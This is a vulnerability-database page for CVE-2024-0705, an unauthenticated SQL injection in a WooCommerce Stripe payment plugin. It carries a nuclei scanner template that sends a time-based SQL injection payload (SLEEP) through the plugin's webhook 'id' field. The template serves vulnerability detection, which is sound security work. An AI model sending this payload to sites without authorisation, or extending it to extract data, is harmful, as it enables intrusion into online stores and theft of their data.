Lucene search
K

Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection

🗓️ 10 Feb 2026 11:24:37Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

This is an unauthenticated SQL injection in Stripe Payment Plugin for WooCommerce up to 3.7.9 via id.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Missing Authorization in Themegrill Colormag
19 Jan 202422:30
githubexploit
Circl
CVE-2024-0705
19 Jan 202411:26
circl
CNNVD
WordPress Plugin Stripe Payment Plugin for WooCommerce Security Vulnerability
19 Jan 202400:00
cnnvd
CVE
CVE-2024-0705
19 Jan 202409:31
cve
Cvelist
CVE-2024-0705 Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection
19 Jan 202409:31
cvelist
EUVD
EUVD-2024-16495
3 Oct 202520:07
euvd
NVD
CVE-2024-0705
19 Jan 202410:15
nvd
OSV
CVE-2024-0705
19 Jan 202410:15
osv
Patchstack
WordPress Stripe Payment Gateway for WooCommerce Plugin <= 3.7.9 is vulnerable to SQL Injection
19 Jan 202400:00
patchstack
Prion
Sql injection
19 Jan 202410:15
prion
Rows per page
id: CVE-2024-0705

info:
  name: Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    Stripe Payment Plugin for WooCommerce for WordPress versions up to 3.7.9 contains a sql_injection caused by insufficient escaping and lack of preparation on 'id' parameter, letting unauthenticated attackers execute arbitrary SQL queries, exploit requires sending crafted 'id' parameter.
  remediation: |
    Update to the latest version of the plugin, above 3.7.9, to fix the vulnerability.
  impact: |
    Attackers can execute arbitrary SQL queries, potentially leading to data disclosure or modification of sensitive database information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0705
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "plugins/payment-gateway-stripe-and-woocommerce-integration/"
  tags: cve,cve2024,wp-plugin,wp,wordpress,woocommerce,stripe,sqli,unauth,time-based

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "payment-gateway-stripe")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 10s
        POST /?wc-api=wt_stripe HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"type":"charge.succeeded","data":{"object":{"id":"sqli_test' AND (SELECT 1 FROM (SELECT SLEEP(6))a)#","metadata":{"order_id":"999999"}}}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022016a8f39a483086cb723a70472fc1b9e9e03c54f04f39acf8999ef20f420f33140220077b732ba43da08f8f739ae6a0f28c58e4c298a92cc0b1b34cd8584a3bd31b42:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 15:02Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.17.5 - 9.8
EPSS0.02657
SSVC
9